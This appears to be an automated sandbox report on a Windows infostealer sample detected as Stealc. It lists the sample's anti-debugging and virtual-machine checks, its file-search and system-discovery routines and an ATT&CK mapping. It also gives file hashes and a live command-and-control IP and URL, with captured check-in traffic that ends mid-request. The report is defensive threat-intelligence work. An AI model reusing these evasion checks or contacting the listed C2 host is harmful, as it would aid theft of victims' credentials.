                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F2198D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F9E888 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00B138B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B14910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B14910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00B0DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00B0E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00B0ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B14570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00B14570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B0F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B13EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00B13EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0F68A FindFirstFileA,0_2_00B0F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B016D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B0DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00B0BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B01160 GetSystemInfo,ExitProcess,0_2_00B01160
                Source: file.exe, file.exe, 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2102191694.0000000001223000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2102191694.0000000001255000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2102191694.0000000001249000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2102191694.00000000011DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2102191694.00000000011DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareM
                Source: file.exe, 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13686
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13689
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13700
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13740
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13707
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B045C0 VirtualProtect ?,00000004,00000100,000000000_2_00B045C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B19860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B19860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B19750 mov eax, dword ptr fs:[00000030h]0_2_00B19750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B178E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00B178E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3536, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B19600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00B19600
                Source: file.exe, file.exe, 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: _!Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00B17B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B17980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00B17980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B17850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00B17850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B17A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00B17A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.b00000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2102191694.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2061075276.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3536, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.b00000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2102191694.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2061075276.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3536, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.phpV17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpn17%VirustotalBrowse
                http://185.215.113.37/H17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpnfile.exe, 00000000.00000002.2102191694.0000000001249000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37file.exe, 00000000.00000002.2102191694.00000000011DE000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/Hfile.exe, 00000000.00000002.2102191694.0000000001238000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.phpVfile.exe, 00000000.00000002.2102191694.0000000001249000.00000004.00000020.00020000.00000000.sdmptrueunknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                185.215.113.37
                		unknownPortugal
                		206894WHOLESALECONNECTIONSNLtrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1525474
                Start date and time:2024-10-04 09:44:09 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 3m 7s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:2
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 19
                • Number of non-executed functions: 87
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                • 185.215.113.37/e2b1563c6670f193.php

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                WHOLESALECONNECTIONSNLAura.exeGet hashmaliciousRedLineBrowse
                • 185.215.113.22
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.947855656085323
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1'874'432 bytes
                MD5:0ab8fd273f356fc72fc0d8971976f60e
                SHA1:f88991b3868aad8231d28caa354f0f8a29deeb3b
                SHA256:6b87bd43d236ccd979ff563fea34490f006871209d6db9123c494a1a9138fd2d
                SHA512:3c9ca086a2e351f5fa894dedcefbb52c2c8b0735fe79c743769c4f00cb7ab383f88428c733837393d5b6a9692b538f204b1b59f15380914d8a3dfdd080543ff2
                SSDEEP:24576:nYbrBfGzNXBOybduTfsDb+2Ew2WngxgM9G6S+NG1TvoG0pRZzh89uq6WgT+nvIg4:nYdUxOyqfsDb0wxgOINpNsTs8NNNeV
                TLSH:6E8533B1EE11E496E469A630CC2BC32F79B5F9E574DA0EB079FC51B7979004A05ED02C
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                File Icon

                Icon Hash:00928e8e8686b000

                Static PE Info

                General

                Entrypoint:0xab2000
                Entrypoint Section:.taggant
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:2eabe9054cad5152567f0699947a2c5b

                Entrypoint Preview

                Instruction
                jmp 00007F2AD886885Ah
                vmread dword ptr [eax+eax], ebx
                add byte ptr [eax], al
                add byte ptr [eax], al
                jmp 00007F2AD886A855h
                add byte ptr [ecx], al
                or al, byte ptr [eax]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], dh
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [edi], al
                add byte ptr [eax], 00000000h
                add byte ptr [eax], al
                add byte ptr [eax], al
                adc byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add eax, 0000000Ah
                add byte ptr [eax], al
                add byte ptr [eax], dh
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax+00000000h], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [edi], al
                add byte ptr [eax], 00000000h
                add byte ptr [eax], al
                add byte ptr [eax], al
                adc byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add eax, 0000000Ah
                add byte ptr [eax], al
                add byte ptr [eax], dl
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [edx+ecx], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add dword ptr [eax+00000000h], eax
                add byte ptr [eax], al
                adc byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add eax, 0000000Ah
                add byte ptr [eax], al
                add byte ptr [eax], dh
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [edi], bl
                add byte ptr [eax+000000FEh], ah
                add byte ptr [edx], ah
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [ecx], cl
                add byte ptr [eax], 00000000h
                add byte ptr [eax], al
                add byte ptr [eax], al

                Rich Headers

                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                0x10000x25b0000x228003899c9ecec365d4db50ffbfa0d2b3d0funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                0x25e0000x2af0000x200e84d6fdfa6dabc43eca0796d6767ab5eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                incycuuu0x50d0000x1a40000x1a3800886b6a7b843221d10701ec5044d49e26False0.9948040822407628data7.953045233922871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                crmoanhn0x6b10000x10000x400674bcc98d84f6ea570b0dd59cf71c60cFalse0.8359375data6.3119947292621905IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant0x6b20000x30000x220096105a6e1f60aab01be989d9830cfab0False0.080078125DOS executable (COM)1.0390559895018023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                Imports

                DLLImport
                kernel32.dlllstrcpy

                Network Behavior

                Suricata IDS Alerts

                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2024-10-04T09:45:05.821293+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.3780TCP

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Oct 4, 2024 09:45:04.863622904 CEST4970480192.168.2.5185.215.113.37
                Oct 4, 2024 09:45:04.868904114 CEST8049704185.215.113.37192.168.2.5
                Oct 4, 2024 09:45:04.869003057 CEST4970480192.168.2.5185.215.113.37
                Oct 4, 2024 09:45:04.869113922 CEST4970480192.168.2.5185.215.113.37
                Oct 4, 2024 09:45:04.873917103 CEST8049704185.215.113.37192.168.2.5
                Oct 4, 2024 09:45:05.585304022 CEST8049704185.215.113.37192.168.2.5
                Oct 4, 2024 09:45:05.585366964 CEST4970480192.168.2.5185.215.113.37
                Oct 4, 2024 09:45:05.588709116 CEST4970480192.168.2.5185.215.113.37
                Oct 4, 2024 09:45:05.593564987 CEST8049704185.215.113.37192.168.2.5
                Oct 4, 2024 09:45:05.821223974 CEST8049704185.215.113.37192.168.2.5
                Oct 4, 2024 09:45:05.821293116 CEST4970480192.168.2.5185.215.113.37
                Oct 4, 2024 09:45:08.446281910 CEST4970480192.168.2.5185.215.113.37

                HTTP Request Dependency Graph

                • 185.215.113.37

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.549704185.215.113.37803536C:\Users\user\Desktop\file.exe
                TimestampBytes transferredDirectionData
                Oct 4, 2024 09:45:04.869113922 CEST89OUTGET / HTTP/1.1
                Host: 185.215.113.37
                Connection: Keep-Alive
                Cache-Control: no-cache
                Oct 4, 2024 09:45:05.585304022 CEST203INHTTP/1.1 200 OK
                Date: Fri, 04 Oct 2024 07:45:05 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 0
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Oct 4, 2024 09:45:05.588709116 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                Content-Type: multipart/form-data; boundary=----AEHIECAFCGDBFHIDBKFC
                Host: 185.215.113.37
                Content-Length: 211
                Connection: Keep-Alive
                Cache-Control: no-cache
